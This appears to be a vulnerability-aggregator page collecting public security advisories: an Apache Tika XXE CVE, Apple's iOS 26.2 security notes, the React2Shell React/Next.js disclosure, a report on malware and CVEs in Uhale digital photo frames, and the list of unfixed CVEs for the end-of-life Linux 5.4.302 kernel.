Recent bundles

Ref: https://seclists.org/oss-sec/2025/q4/238

Severity: critical

Affected versions:

  • Apache Tika core (org.apache.tika:tika-core) 1.13 through 3.2.1
  • Apache Tika parsers (org.apache.tika:tika-parsers) 1.13 before 2.0.0
  • Apache Tika PDF parser module (org.apache.tika:tika-parser-pdf-module) 2.0.0 through 3.2.1

Description:

Critical XXE in Apache Tika tika-core (1.13-3.2.1), tika-pdf-module (2.0.0-3.2.1) and tika-parsers (1.13-1.28.5) modules on all platforms allows an attacker to carry out XML External Entity injection via a crafted XFA file inside of a PDF.

This CVE covers the same vulnerability as in CVE-2025-54988. However, this CVE expands the scope of affected packages in two ways.

First, while the entrypoint for the vulnerability was the tika-parser-pdf-module as reported in CVE-2025-54988, the vulnerability and its fix were in tika-core. Users who upgraded the tika-parser-pdf-module but did not upgrade tika-core to >= 3.2.2 would still be vulnerable.

Second, the original report failed to mention that in the 1.x Tika releases, the PDFParser was in the "org.apache.tika:tika-parsers" module.

References: Ref: https://seclists.org/oss-sec/2025/q4/238


Related vulnerabilities: CVE-2025-54988CVE-2025-66516

About the security content of iOS 26.2 and iPadOS 26.2 - Apple Support

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security releases page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

Released December 12, 2025

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access sensitive payment tokens

Description: A permissions issue was addressed with additional restrictions.

CVE-2025-46288: floeki, Zhongcheng Li from IES Red Team of ByteDance

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing a file may lead to memory corruption

Description: The issue was addressed with improved bounds checks.

CVE-2025-43539: Michael Reeves (@IntegralPilot)

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An attacker may be able to spoof their FaceTime caller ID

Description: An inconsistent user interface issue was addressed with improved state management.

CVE-2025-46287: an anonymous researcher, Riley Walz

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Multiple issues in curl

Description: This is a vulnerability in open source code and Apple Software is among the affected projects. The CVE-ID was assigned by a third party. Learn more about the issue and CVE-ID at cve.org.

CVE-2024-7264

CVE-2025-9086

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Password fields may be unintentionally revealed when remotely controlling a device over FaceTime

Description: This issue was addressed with improved state management.

CVE-2025-43542: Yiğit Ocak

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to inappropriately access files through the spellcheck API

Description: A logic issue was addressed with improved checks.

CVE-2025-43518: Noah Gregory (wts.dev)

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing malicious data may lead to unexpected app termination

Description: A memory corruption issue was addressed with improved bounds checking.

CVE-2025-43532: Andrew Calvano and Lucas Pinheiro of Meta Product Security

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to identify what other apps a user has installed

Description: A permissions issue was addressed with additional restrictions.

CVE-2025-46279: Duy Trần (@khanhduytran0)

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to gain root privileges

Description: An integer overflow was addressed by adopting 64-bit timestamps.

CVE-2025-46285: Kaitao Xie and Xiaolong Bai of Alibaba Group

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing a file may lead to memory corruption

Description: This is a vulnerability in open source code and Apple Software is among the affected projects. The CVE-ID was assigned by a third party. Learn more about the issue and CVE-ID at cve.org.

CVE-2025-5918

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access user-sensitive data

Description: A logging issue was addressed with improved data redaction.

CVE-2025-43475: Rosyna Keller of Totally Not Malicious Software

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access sensitive user data

Description: An information disclosure issue was addressed with improved privacy controls.

CVE-2025-46276: Rosyna Keller of Totally Not Malicious Software

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: A malicious HID device may cause an unexpected process crash

Description: Multiple memory corruption issues were addressed with improved input validation.

CVE-2025-43533: Google Threat Analysis Group

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Photos in the Hidden Photos Album may be viewed without authentication

Description: A configuration issue was addressed with additional restrictions.

CVE-2025-43428: an anonymous researcher, Michael Schmutzer of Technische Hochschule Ingolstadt

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access a user’s Safari history

Description: A logging issue was addressed with improved data redaction.

CVE-2025-46277: Kirin (@Pwnrin)

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access sensitive user data

Description: A logging issue was addressed with improved data redaction.

CVE-2025-43538: Iván Savransky

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access user-sensitive data

Description: This issue was addressed with additional entitlement checks.

CVE-2025-46292: Rosyna Keller of Totally Not Malicious Software

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to an unexpected Safari crash

Description: A type confusion issue was addressed with improved state handling.

WebKit Bugzilla: 301257

CVE-2025-43541: Hossein Lotfi (@hosselot) of Trend Micro Zero Day Initiative

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to an unexpected process crash

Description: A use-after-free issue was addressed with improved memory management.

WebKit Bugzilla: 301726

CVE-2025-43536: Nan Wang (@eternalsakura13)

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to an unexpected process crash

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 300774

WebKit Bugzilla: 301338

CVE-2025-43535: Google Big Sleep, Nan Wang (@eternalsakura13)

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to an unexpected process crash

Description: A buffer overflow issue was addressed with improved memory handling.

WebKit Bugzilla: 301371

CVE-2025-43501: Hossein Lotfi (@hosselot) of Trend Micro Zero Day Initiative

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to an unexpected process crash

Description: A race condition was addressed with improved state handling.

WebKit Bugzilla: 301940

CVE-2025-43531: Phil Pizlo of Epic Games

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 26. CVE-2025-14174 was also issued in response to this report.

Description: A use-after-free issue was addressed with improved memory management.

WebKit Bugzilla: 302502

CVE-2025-43529: Google Threat Analysis Group

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to memory corruption. Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 26. CVE-2025-43529 was also issued in response to this report.

Description: A memory corruption issue was addressed with improved validation.

WebKit Bugzilla: 303614

CVE-2025-14174: Apple and Google Threat Analysis Group

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to an unexpected process crash

Description: A use-after-free issue was addressed with improved memory management.

WebKit Bugzilla: 300926

CVE-2025-43511: 이동하 (Lee Dong Ha of BoB 14th)

We would like to acknowledge an anonymous researcher for their assistance.

We would like to acknowledge Mickey Jin (@patch1t) for their assistance.

We would like to acknowledge Golden Helm Securities for their assistance.

We would like to acknowledge Mochammad Nosa Shandy Prastyo for their assistance.

We would like to acknowledge Richard Hyunho Im (@richeeta) at Route Zero Security (routezero.security) for their assistance.

We would like to acknowledge Geva Nurgandi Syahputra (gevakun) for their assistance.

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: December 12, 2025


Related vulnerabilities: CVE-2025-46285CVE-2025-43542CVE-2025-43536CVE-2025-43541CVE-2025-43539CVE-2025-43529CVE-2025-43501CVE-2024-7264CVE-2025-43532CVE-2025-43531CVE-2025-43475CVE-2025-43535CVE-2025-43511CVE-2025-5918CVE-2025-46287CVE-2025-46276CVE-2025-43538CVE-2025-14174CVE-2025-43428CVE-2025-43533CVE-2025-43518CVE-2025-46277CVE-2025-46292CVE-2025-46288CVE-2025-9086CVE-2025-46279

React2Shell
2025-12-05T13:54:28 by Alexandre Dulaunoy

React2Shell (CVE-2025-55182)

What?

A 10.0 critical severity vulnerablility affecting server-side use of React.js, tracked as CVE-2025-55182 in React.js and CVE-2025-66478 specifically for the Next.js framework.

This vulnerability was responsibly disclosed by myself, Lachlan Davidson on 29 November 2025 PT to the Meta team. Initial disclosure and patch release was performed by React and Vercel on 3 December 2025 PT.

Update: Proof-of-Concepts

A real public PoC began circulating after around 30 hours from initial disclosure, I've now shared my PoCs several hours later. Full writeup in due course :)

Update: A note on scanners (4 December 20:55 UTC)

We've seen some great scanners from the likes of Assetnote, which are very effective at detecting unpatched Next.js instances that use Server Components.

However, there's another nuance that we'd like to highlight: The day-0 protections from some providers are actually runtime-level, and not just WAF rules. So many customers with theoretically vulnerable versions are, to our knowledge, still protected.

We're aware of many submissions to Bug Bounty programs, etc. based on these scanner outputs, many of which may be false positives. Unfortuantely, at this point in time, we cannot share any methods to concretely identify with certainity if you are vulnerable. So when in doubt: patch!

Update: A note on invalid PoCs (4 December 03:25 UTC)

We have seen a rapid trend of "Proof of Concepts" spreading which are not genuine PoCs.

Anything that requires the developer to have explicitly exposed dangerous functionality to the client is not a valid PoC. Common examples we've seen in supposed "PoCs" are vm#runInThisContext, child_process#exec, and fs#writeFile.

This would only be exploitable if you had consciously chosen to let clients invoke these, which would be dangerous no matter what. The genuine vulnerability does not have this constraint. In Next.js, the list of server functions is managed for you, and does not contain these.

Many of these "PoCs" have been referenced in publications, and even some vulnerability aggregators. We are concerned that these may lead to false negatives when evaluating if a service is vulnerable, or lead to unpreparedness if or when a genuine PoC surfaces.

Am I affected?

Refer to vendor advisories from React and Next.js.

What happened to CVE-2025-66478?

This CVE was (technically correctly) marked as a duplicate of CVE-2025-55182.

The decision to publish a second CVE for Next.js was made due to these exceptional circumstsances: Next.js does not include React as a traditional dependency - instead, they bundle it "vendored". So, if you're using Next.js, many dependency tools do not automatically recognise it as vulnerable.

Aditional React vulnerabilities (CVE-2025-55183, CVE-2025-55184, CVE-2025-67779)

Denial of Service - High Severity: CVE-2025-55184 and CVE-2025-67779 (CVSS 7.5)

(CVE-2025-55184 was incompletely fixed, leading to the full fixes being tracked under CVE-2025-67779.)

"Security researchers have discovered that a malicious HTTP request can be crafted and sent to any Server Functions endpoint that, when deserialized by React, can cause an infinite loop that hangs the server process and consumes CPU. Even if your app does not implement any React Server Function endpoints it may still be vulnerable if your app supports React Server Components.

This creates a vulnerability vector where an attacker may be able to deny users from accessing the product, and potentially have a performance impact on the server environment."

Source Code Exposure - Medium Severity: CVE-2025-55183 (CVSS 5.3)


Related vulnerabilities: CVE-2025-55184GHSA-9QR9-H5GF-34MPGHSA-FV66-9V8Q-G76RCVE-2025-55182CVE-2025-66478CVE-2025-55183CVE-2025-67779

> Experts have found that many of the digital frame models analyzed download malicious payloads from Chinese servers immediately after ignition. At startup, devices check for an update of the Uhale app, install the update to version 4.2.0 and restart. After restarting, the updated app starts downloading and running the malware. > > The downloaded JAR/DEX file is saved in the Uhale application directory and run at each subsequent system start. It is not yet clear why version 4.2.0 of the application became malicious (whether this was done intentionally by the developers themselves or whether the ZEASN upgrade infrastructure was compromised). > > The malware detected has been linked to the Vo1d botnet, which has millions of devices, as well as the Mzmess family of malware. This connection is confirmed by packet prefixes, string names, endpoints, malware distribution process, and a range of artifacts. > > In addition to the automatic download of the malware (which did not occur on all the frames analyzed), the researchers also discovered numerous vulnerabilities. In their report, Quokka's specialists detailed 17 problems, 11 of which have already received CVE identifiers.

The most serious are:

  • CVE-2025-58392 and CVE-2025-58397 – An insecure implementation of TrustManager allows a MitM attack to inject counterfeit encrypted responses, eventually leading to remote code execution with root privileges;
  • CVE-2025-58388 – During an application update, raw file names are passed directly to shell commands, allowing command injection and remote installation of arbitrary APKs;
  • CVE-2025-58394 – All the camera frames tested were shipped with disabled SELinux, default root access and AOSP public test keys, which means they were completely compromised from the first moment;
  • CVE-2025-58396 – A pre-installed application launches a file server on the TCP 17802 port, which accepts file uploads without authentication. As a result, any host on the local network gets the ability to write or delete arbitrary files on your device;
  • CVE-2025-58390 – WebView in the app ignores SSL/TLS errors and allows mixed content, allowing attackers to inject or intercept data viewed on the device, opening the door to phishing and content spoofing.


Related vulnerabilities: CVE-2025-58388CVE-2025-58397CVE-2025-58392CVE-2025-58396CVE-2025-58390CVE-2025-58394

Re: Linux 5.4.302 - Greg Kroah-Hartman

From: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
To: linux-kernel@vger.kernel.org, akpm@linux-foundation.org,
    torvalds@linux-foundation.org, stable@vger.kernel.org
Cc: lwn@lwn.net, jslaby@suse.cz
Subject: Re: Linux 5.4.302
Date: Wed, 3 Dec 2025 13:50:40 +0100    [thread overview]
Message-ID: <2025120358-skating-outage-7c61@gregkh> (raw)
In-Reply-To: <2025120319-blip-grime-93e8@gregkh>

On Wed, Dec 03, 2025 at 01:12:32PM +0100, Greg Kroah-Hartman wrote:
> I'm announcing the release of the 5.4.302 kernel.
> 
> This is the LAST 5.4.y release.  It is now end-of-life and should not be
> used by anyone, anymore.  As of this point in time, there are 1539
> documented unfixed CVEs for this kernel branch, and that number will
> only increase over time as more CVEs get assigned for kernel bugs.

And here's that list, if anyone is curious:

    5.4.302 is vulnerable to CVE-2020-36776
    5.4.302 is vulnerable to CVE-2020-36784
    5.4.302 is vulnerable to CVE-2020-36788
    5.4.302 is vulnerable to CVE-2021-46925
    5.4.302 is vulnerable to CVE-2021-46926
    5.4.302 is vulnerable to CVE-2021-46928
    5.4.302 is vulnerable to CVE-2021-46941
    5.4.302 is vulnerable to CVE-2021-46987
    5.4.302 is vulnerable to CVE-2021-47001
    5.4.302 is vulnerable to CVE-2021-47004
    5.4.302 is vulnerable to CVE-2021-47005
    5.4.302 is vulnerable to CVE-2021-47024
    5.4.302 is vulnerable to CVE-2021-47049
    5.4.302 is vulnerable to CVE-2021-47061
    5.4.302 is vulnerable to CVE-2021-47063
    5.4.302 is vulnerable to CVE-2021-47070
    5.4.302 is vulnerable to CVE-2021-47074
    5.4.302 is vulnerable to CVE-2021-47076
    5.4.302 is vulnerable to CVE-2021-47077
    5.4.302 is vulnerable to CVE-2021-47101
    5.4.302 is vulnerable to CVE-2021-47113
    5.4.302 is vulnerable to CVE-2021-47116
    5.4.302 is vulnerable to CVE-2021-47119
    5.4.302 is vulnerable to CVE-2021-47131
    5.4.302 is vulnerable to CVE-2021-47143
    5.4.302 is vulnerable to CVE-2021-47158
    5.4.302 is vulnerable to CVE-2021-47182
    5.4.302 is vulnerable to CVE-2021-47183
    5.4.302 is vulnerable to CVE-2021-47188
    5.4.302 is vulnerable to CVE-2021-47191
    5.4.302 is vulnerable to CVE-2021-47193
    5.4.302 is vulnerable to CVE-2021-47198
    5.4.302 is vulnerable to CVE-2021-47205
    5.4.302 is vulnerable to CVE-2021-47211
    5.4.302 is vulnerable to CVE-2021-47212
    5.4.302 is vulnerable to CVE-2021-47219
    5.4.302 is vulnerable to CVE-2021-47226
    5.4.302 is vulnerable to CVE-2021-47234
    5.4.302 is vulnerable to CVE-2021-47247
    5.4.302 is vulnerable to CVE-2021-47253
    5.4.302 is vulnerable to CVE-2021-47265
    5.4.302 is vulnerable to CVE-2021-47275
    5.4.302 is vulnerable to CVE-2021-47281
    5.4.302 is vulnerable to CVE-2021-47283
    5.4.302 is vulnerable to CVE-2021-47331
    5.4.302 is vulnerable to CVE-2021-47335
    5.4.302 is vulnerable to CVE-2021-47339
    5.4.302 is vulnerable to CVE-2021-47359
    5.4.302 is vulnerable to CVE-2021-47362
    5.4.302 is vulnerable to CVE-2021-47366
    5.4.302 is vulnerable to CVE-2021-47378
    5.4.302 is vulnerable to CVE-2021-47381
    5.4.302 is vulnerable to CVE-2021-47391
    5.4.302 is vulnerable to CVE-2021-47399
    5.4.302 is vulnerable to CVE-2021-47407
    5.4.302 is vulnerable to CVE-2021-47408
    5.4.302 is vulnerable to CVE-2021-47410
    5.4.302 is vulnerable to CVE-2021-47412
    5.4.302 is vulnerable to CVE-2021-47414
    5.4.302 is vulnerable to CVE-2021-47428
    5.4.302 is vulnerable to CVE-2021-47432
    5.4.302 is vulnerable to CVE-2021-47433
    5.4.302 is vulnerable to CVE-2021-47438
    5.4.302 is vulnerable to CVE-2021-47452
    5.4.302 is vulnerable to CVE-2021-47455
    5.4.302 is vulnerable to CVE-2021-47473
    5.4.302 is vulnerable to CVE-2021-47479
    5.4.302 is vulnerable to CVE-2021-47490
    5.4.302 is vulnerable to CVE-2021-47491
    5.4.302 is vulnerable to CVE-2021-47492
    5.4.302 is vulnerable to CVE-2021-47493
    5.4.302 is vulnerable to CVE-2021-47498
    5.4.302 is vulnerable to CVE-2021-47501
    5.4.302 is vulnerable to CVE-2021-47504
    5.4.302 is vulnerable to CVE-2021-47508
    5.4.302 is vulnerable to CVE-2021-47523
    5.4.302 is vulnerable to CVE-2021-47544
    5.4.302 is vulnerable to CVE-2021-47552
    5.4.302 is vulnerable to CVE-2021-47559
    5.4.302 is vulnerable to CVE-2021-47560
    5.4.302 is vulnerable to CVE-2021-47577
    5.4.302 is vulnerable to CVE-2021-47578
    5.4.302 is vulnerable to CVE-2021-47580
    5.4.302 is vulnerable to CVE-2021-47582
    5.4.302 is vulnerable to CVE-2021-47599
    5.4.302 is vulnerable to CVE-2021-47610
    5.4.302 is vulnerable to CVE-2021-47618
    5.4.302 is vulnerable to CVE-2021-47622
    5.4.302 is vulnerable to CVE-2021-47623
    5.4.302 is vulnerable to CVE-2021-47632
    5.4.302 is vulnerable to CVE-2021-47635
    5.4.302 is vulnerable to CVE-2021-47648
    5.4.302 is vulnerable to CVE-2021-47653
    5.4.302 is vulnerable to CVE-2022-48628
    5.4.302 is vulnerable to CVE-2022-48633
    5.4.302 is vulnerable to CVE-2022-48642
    5.4.302 is vulnerable to CVE-2022-48664
    5.4.302 is vulnerable to CVE-2022-48673
    5.4.302 is vulnerable to CVE-2022-48674
    5.4.302 is vulnerable to CVE-2022-48706
    5.4.302 is vulnerable to CVE-2022-48712
    5.4.302 is vulnerable to CVE-2022-48721
    5.4.302 is vulnerable to CVE-2022-48733
    5.4.302 is vulnerable to CVE-2022-48740
    5.4.302 is vulnerable to CVE-2022-48744
    5.4.302 is vulnerable to CVE-2022-48751
    5.4.302 is vulnerable to CVE-2022-48755
    5.4.302 is vulnerable to CVE-2022-48761
    5.4.302 is vulnerable to CVE-2022-48763
    5.4.302 is vulnerable to CVE-2022-48765
    5.4.302 is vulnerable to CVE-2022-48769
    5.4.302 is vulnerable to CVE-2022-48791
    5.4.302 is vulnerable to CVE-2022-48792
    5.4.302 is vulnerable to CVE-2022-48796
    5.4.302 is vulnerable to CVE-2022-48802
    5.4.302 is vulnerable to CVE-2022-48811
    5.4.302 is vulnerable to CVE-2022-48825
    5.4.302 is vulnerable to CVE-2022-48826
    5.4.302 is vulnerable to CVE-2022-48827
    5.4.302 is vulnerable to CVE-2022-48833
    5.4.302 is vulnerable to CVE-2022-48844
    5.4.302 is vulnerable to CVE-2022-48852
    5.4.302 is vulnerable to CVE-2022-48863
    5.4.302 is vulnerable to CVE-2022-48865
    5.4.302 is vulnerable to CVE-2022-48875
    5.4.302 is vulnerable to CVE-2022-48887
    5.4.302 is vulnerable to CVE-2022-48893
    5.4.302 is vulnerable to CVE-2022-48901
    5.4.302 is vulnerable to CVE-2022-48902
    5.4.302 is vulnerable to CVE-2022-48909
    5.4.302 is vulnerable to CVE-2022-48920
    5.4.302 is vulnerable to CVE-2022-48943
    5.4.302 is vulnerable to CVE-2022-48950
    5.4.302 is vulnerable to CVE-2022-48952
    5.4.302 is vulnerable to CVE-2022-48953
    5.4.302 is vulnerable to CVE-2022-48961
    5.4.302 is vulnerable to CVE-2022-48975
    5.4.302 is vulnerable to CVE-2022-48979
    5.4.302 is vulnerable to CVE-2022-49000
    5.4.302 is vulnerable to CVE-2022-49026
    5.4.302 is vulnerable to CVE-2022-49027
    5.4.302 is vulnerable to CVE-2022-49028
    5.4.302 is vulnerable to CVE-2022-49046
    5.4.302 is vulnerable to CVE-2022-49054
    5.4.302 is vulnerable to CVE-2022-49065
    5.4.302 is vulnerable to CVE-2022-49069
    5.4.302 is vulnerable to CVE-2022-49072
    5.4.302 is vulnerable to CVE-2022-49097
    5.4.302 is vulnerable to CVE-2022-49102
    5.4.302 is vulnerable to CVE-2022-49103
    5.4.302 is vulnerable to CVE-2022-49104
    5.4.302 is vulnerable to CVE-2022-49106
    5.4.302 is vulnerable to CVE-2022-49107
    5.4.302 is vulnerable to CVE-2022-49109
    5.4.302 is vulnerable to CVE-2022-49110
    5.4.302 is vulnerable to CVE-2022-49112
    5.4.302 is vulnerable to CVE-2022-49118
    5.4.302 is vulnerable to CVE-2022-49119
    5.4.302 is vulnerable to CVE-2022-49120
    5.4.302 is vulnerable to CVE-2022-49121
    5.4.302 is vulnerable to CVE-2022-49124
    5.4.302 is vulnerable to CVE-2022-49129
    5.4.302 is vulnerable to CVE-2022-49134
    5.4.302 is vulnerable to CVE-2022-49135
    5.4.302 is vulnerable to CVE-2022-49138
    5.4.302 is vulnerable to CVE-2022-49142
    5.4.302 is vulnerable to CVE-2022-49149
    5.4.302 is vulnerable to CVE-2022-49154
    5.4.302 is vulnerable to CVE-2022-49156
    5.4.302 is vulnerable to CVE-2022-49157
    5.4.302 is vulnerable to CVE-2022-49158
    5.4.302 is vulnerable to CVE-2022-49161
    5.4.302 is vulnerable to CVE-2022-49164
    5.4.302 is vulnerable to CVE-2022-49168
    5.4.302 is vulnerable to CVE-2022-49169
    5.4.302 is vulnerable to CVE-2022-49170
    5.4.302 is vulnerable to CVE-2022-49172
    5.4.302 is vulnerable to CVE-2022-49174
    5.4.302 is vulnerable to CVE-2022-49178
    5.4.302 is vulnerable to CVE-2022-49182
    5.4.302 is vulnerable to CVE-2022-49188
    5.4.302 is vulnerable to CVE-2022-49190
    5.4.302 is vulnerable to CVE-2022-49194
    5.4.302 is vulnerable to CVE-2022-49196
    5.4.302 is vulnerable to CVE-2022-49201
    5.4.302 is vulnerable to CVE-2022-49215
    5.4.302 is vulnerable to CVE-2022-49219
    5.4.302 is vulnerable to CVE-2022-49226
    5.4.302 is vulnerable to CVE-2022-49234
    5.4.302 is vulnerable to CVE-2022-49241
    5.4.302 is vulnerable to CVE-2022-49246
    5.4.302 is vulnerable to CVE-2022-49258
    5.4.302 is vulnerable to CVE-2022-49267
    5.4.302 is vulnerable to CVE-2022-49281
    5.4.302 is vulnerable to CVE-2022-49285
    5.4.302 is vulnerable to CVE-2022-49289
    5.4.302 is vulnerable to CVE-2022-49294
    5.4.302 is vulnerable to CVE-2022-49296
    5.4.302 is vulnerable to CVE-2022-49303
    5.4.302 is vulnerable to CVE-2022-49309
    5.4.302 is vulnerable to CVE-2022-49311
    5.4.302 is vulnerable to CVE-2022-49312
    5.4.302 is vulnerable to CVE-2022-49317
    5.4.302 is vulnerable to CVE-2022-49319
    5.4.302 is vulnerable to CVE-2022-49323
    5.4.302 is vulnerable to CVE-2022-49325
    5.4.302 is vulnerable to CVE-2022-49327
    5.4.302 is vulnerable to CVE-2022-49328
    5.4.302 is vulnerable to CVE-2022-49342
    5.4.302 is vulnerable to CVE-2022-49360
    5.4.302 is vulnerable to CVE-2022-49361
    5.4.302 is vulnerable to CVE-2022-49376
    5.4.302 is vulnerable to CVE-2022-49390
    5.4.302 is vulnerable to CVE-2022-49398
    5.4.302 is vulnerable to CVE-2022-49420
    5.4.302 is vulnerable to CVE-2022-49428
    5.4.302 is vulnerable to CVE-2022-49430
    5.4.302 is vulnerable to CVE-2022-49437
    5.4.302 is vulnerable to CVE-2022-49440
    5.4.302 is vulnerable to CVE-2022-49443
    5.4.302 is vulnerable to CVE-2022-49444
    5.4.302 is vulnerable to CVE-2022-49445
    5.4.302 is vulnerable to CVE-2022-49449
    5.4.302 is vulnerable to CVE-2022-49453
    5.4.302 is vulnerable to CVE-2022-49465
    5.4.302 is vulnerable to CVE-2022-49468
    5.4.302 is vulnerable to CVE-2022-49470
    5.4.302 is vulnerable to CVE-2022-49496
    5.4.302 is vulnerable to CVE-2022-49497
    5.4.302 is vulnerable to CVE-2022-49502
    5.4.302 is vulnerable to CVE-2022-49504
    5.4.302 is vulnerable to CVE-2022-49512
    5.4.302 is vulnerable to CVE-2022-49513
    5.4.302 is vulnerable to CVE-2022-49519
    5.4.302 is vulnerable to CVE-2022-49521
    5.4.302 is vulnerable to CVE-2022-49528
    5.4.302 is vulnerable to CVE-2022-49531
    5.4.302 is vulnerable to CVE-2022-49534
    5.4.302 is vulnerable to CVE-2022-49535
    5.4.302 is vulnerable to CVE-2022-49536
    5.4.302 is vulnerable to CVE-2022-49540
    5.4.302 is vulnerable to CVE-2022-49541
    5.4.302 is vulnerable to CVE-2022-49542
    5.4.302 is vulnerable to CVE-2022-49545
    5.4.302 is vulnerable to CVE-2022-49546
    5.4.302 is vulnerable to CVE-2022-49555
    5.4.302 is vulnerable to CVE-2022-49562
    5.4.302 is vulnerable to CVE-2022-49563
    5.4.302 is vulnerable to CVE-2022-49564
    5.4.302 is vulnerable to CVE-2022-49566
    5.4.302 is vulnerable to CVE-2022-49578
    5.4.302 is vulnerable to CVE-2022-49579
    5.4.302 is vulnerable to CVE-2022-49585
    5.4.302 is vulnerable to CVE-2022-49599
    5.4.302 is vulnerable to CVE-2022-49603
    5.4.302 is vulnerable to CVE-2022-49610
    5.4.302 is vulnerable to CVE-2022-49618
    5.4.302 is vulnerable to CVE-2022-49622
    5.4.302 is vulnerable to CVE-2022-49623
    5.4.302 is vulnerable to CVE-2022-49630
    5.4.302 is vulnerable to CVE-2022-49632
    5.4.302 is vulnerable to CVE-2022-49635
    5.4.302 is vulnerable to CVE-2022-49640
    5.4.302 is vulnerable to CVE-2022-49641
    5.4.302 is vulnerable to CVE-2022-49650
    5.4.302 is vulnerable to CVE-2022-49651
    5.4.302 is vulnerable to CVE-2022-49658
    5.4.302 is vulnerable to CVE-2022-49664
    5.4.302 is vulnerable to CVE-2022-49666
